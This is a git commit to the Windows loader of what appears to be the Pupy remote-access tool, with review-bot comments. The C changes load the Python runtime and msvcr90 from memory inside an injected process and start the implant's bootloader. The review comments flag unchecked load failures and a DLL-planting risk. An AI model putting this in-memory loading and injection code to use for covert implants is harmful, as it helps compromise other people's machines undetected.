fixed a bug where injecting into a process with python27.dll already loaded crashed

This commit is contained in:
n1nj4sec 2015-09-26 20:48:38 +02:00
parent 76b6cd05e4
commit bc4b324505
4 changed files with 80 additions and 37 deletions


@ -1,3 +1,4 @@
//#define VERBOSE
#ifdef STANDALONE
# include <Python.h>
# include "Python-version.h"


@ -64,6 +64,19 @@ int _load_python_FromFile(char *dllname)
return 1;
}
int _load_msvcr90(char *bytes)
{
HMODULE hmod;
ULONG_PTR cookie = 0;
cookie = _My_ActivateActCtx();
hmod = MyLoadLibrary("msvcr90.dll", bytes, NULL);
if (hmod == NULL) {
return 0;
}
_My_DeactivateActCtx(cookie);
return 1;
}
int _load_python(char *dllname, char *bytes)
{
int i;
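Review bot: `_load_msvcr90` returns 0 on a NULL `hmod` without calling `_My_DeactivateActCtx(cookie)`, so the activation context pushed by `_My_ActivateActCtx()` is left active on the thread on the failure path. Move the deactivate ahead of the early return: `hmod = MyLoadLibrary("msvcr90.dll", bytes, NULL);` / `_My_DeactivateActCtx(cookie);` / `return hmod != NULL;`. The call site added in the main-thread hunk of this commit also discards the return value, so a failed msvcr90 load only surfaces later when the interpreter is used. The hunk begins inside `_load_python_FromFile` and ends inside `_load_python`, both of which continue outside it.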


@ -6,6 +6,7 @@ del *.exp
del pupyx86.exe
del pupyx86.dll
IF [%1]==[quick] GOTO compilation
::First: generate resources :
copy resources\python27_x86.dll resources\python27.dll
%python_path% gen_library_compressed_string.py
@ -16,14 +17,14 @@ copy resources\msvcr90_x86.dll resources\msvcr90.dll
%python_path% gen_resource_header.py resources\msvcr90.dll
%python_path% gen_python_bootloader.py
%python_path% gen_resource_header.py resources\bootloader.pyc
::compile them to obj files :
:compilation
%cl_path% /c resources_library_compressed_string_txt.c
%cl_path% /c resources_bootloader_pyc.c
%cl_path% /c resources_python27_dll.c
%cl_path% /c resources_msvcr90_dll.c
::then compile
%cl_path% /c Python-dynload.c /IC:\Python27\include
%cl_path% /c MemoryModule.c
%cl_path% /c _memimporter.c /IC:\Python27\include


@ -43,18 +43,31 @@ DWORD WINAPI mainThread(LPVOID lpArg)
char * ppath;
FILE * f;
char tmp_python_dll_path[MAX_PATH];
//char tmp_manifest_path[MAX_PATH];
char tmp_manifest_path[MAX_PATH];
char tmp_path[MAX_PATH];
ULONG_PTR cookie = 0;
/*
ACTCTX ctx;
BOOL activated;
HANDLE k32;
//HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
//BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
//void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
//BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
*/
PyGILState_STATE restore_state;
_load_python("msvcr90.dll", resources_msvcr90_dll_start); // needed for the python interpreter
if(!GetModuleHandle("msvcr90.dll")){
#ifndef QUIET
fprintf(stderr,"loading msvcr90.dll\n");
#endif
_load_msvcr90(resources_msvcr90_dll_start);
}
else{
#ifndef QUIET
fprintf(stderr,"msvcr90.dll already loaded\n");
#endif
}
GetTempPath(MAX_PATH, tmp_path);
//InitializeCriticalSection(&csInit);
@ -80,7 +93,7 @@ DWORD WINAPI mainThread(LPVOID lpArg)
fprintf(f,"%s",resource_python_manifest);
fclose(f);
#ifndef QUIET
printf("manifest written to %s\n",tmp_manifest_path);
fprintf(stderr,"manifest written to %s\n",tmp_manifest_path);
#endif
ctx.lpSource = tmp_manifest_path;
@ -98,31 +111,49 @@ DWORD WINAPI mainThread(LPVOID lpArg)
{
int res=0;
//activated = ActivateActCtx(MyActCtx, &actToken);
if(!_load_python("python27.dll", resources_python27_dll_start)){
//cookie=_My_ActivateActCtx();
if(GetModuleHandle("python27.dll")){
HANDLE hp;
#ifndef QUIET
printf("loading python27.dll from memory failed\n");
fprintf(stderr,"python27.dll is already loaded\n");
#endif
_load_python_FromFile("python27.dll"); // does not actually load a new python, but uses the handle of the already loaded one
}
else{
if(!_load_python("python27.dll", resources_python27_dll_start)){
#ifndef QUIET
fprintf(stderr,"loading python27.dll from memory failed\n");
#endif
//if loading from memory fail, we write dll on disk
sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path);
//if loading from memory fail, we write dll on disk
sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path);
f=fopen(tmp_python_dll_path,"wb");
res=fwrite(resources_python27_dll_start, sizeof(char), resources_python27_dll_size, f);
fclose(f);
f=fopen(tmp_python_dll_path,"wb");
res=fwrite(resources_python27_dll_start, sizeof(char), resources_python27_dll_size, f);
fclose(f);
if(!_load_python(tmp_python_dll_path, NULL)){
if(!_load_python("python27.dll", NULL)){ // try loading from system PATH
#ifndef QUIET
printf("could not load python dll\n");
#endif
if(!_load_python(tmp_python_dll_path, NULL)){
if(!_load_python("python27.dll", NULL)){ // try loading from system PATH
#ifndef QUIET
fprintf(stderr,"could not load python dll\n");
#endif
}
}
}
}
#ifndef QUIET
printf("python interpreter loaded\n");
fprintf(stderr,"python interpreter loaded\n");
#endif
}
//_My_DeactivateActCtx(cookie);
}
#ifndef QUIET
fprintf(stderr,"calling PyEval_InitThreads() ...\n");
#endif
PyEval_InitThreads();
#ifndef QUIET
fprintf(stderr,"PyEval_InitThreads() called\n");
#endif
if(!Py_IsInitialized()){
ppath = Py_GetPath();
strcpy(ppath, "\x00");
@ -131,21 +162,19 @@ DWORD WINAPI mainThread(LPVOID lpArg)
Py_Initialize();
#ifndef QUIET
printf("Py_Initialize()\n");
fprintf(stderr,"Py_Initialize()\n");
#endif
PySys_SetObject("frozen", PyBool_FromLong(1));
}
restore_state=PyGILState_Ensure();
PySys_SetObject("frozen", PyBool_FromLong(1));
init_memimporter();
#ifndef QUIET
printf("init_memimporter()\n");
fprintf(stderr,"init_memimporter()\n");
#endif
initpupy();
#ifndef QUIET
printf("initpupy()\n");
fprintf(stderr,"initpupy()\n");
#endif
//mod = PyImport_ImportModule("sys");
@ -153,9 +182,8 @@ DWORD WINAPI mainThread(LPVOID lpArg)
//MessageBoxA(0, "hey ! :D", "DLL Message", MB_OK | MB_ICONINFORMATION);
/* We execute then in the context of '__main__' */
PyEval_InitThreads();
#ifndef QUIET
printf("starting evaluating python code ...\n");
fprintf(stderr,"starting evaluating python code ...\n");
#endif
//PyRun_SimpleString("print 'ok from python'");
m = PyImport_AddModule("__main__");
@ -184,7 +212,7 @@ DWORD WINAPI mainThread(LPVOID lpArg)
/*
if (!DeactivateActCtx(0, actToken)){
#ifndef QUIET
printf("LOADER: Error deactivating context!\n!");
fprintf(stderr,"LOADER: Error deactivating context!\n!");
#endif
}
*/
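Review bot: The new already-loaded branch ignores the result of `_load_python_FromFile("python27.dll")`, and the else branch likewise carries on after the memory, temp-file and PATH attempts have all failed, so the thread reaches the newly added `PyEval_InitThreads()` call with the dynload function pointers unresolved and still prints "python interpreter loaded". Guard the resolve, e.g. `if(!_load_python_FromFile("python27.dll")){ fprintf(stderr,"resolving already-loaded python27.dll failed\n"); return 0; }`, and return from the thread in the same way when the fallbacks fail; the unused `HANDLE hp;` declaration can go. Note also that the on-disk fallback calls `fwrite`/`fclose` on `f` without checking `fopen`, then loads `%TEMP%\python27.dll` regardless of whether the write happened and finally `python27.dll` from the system search path — a DLL planted in either location would be loaded into the injected process, so at minimum check `f` and skip the temp-file load when the write did not succeed. mainThread starts and ends outside the shown hunks.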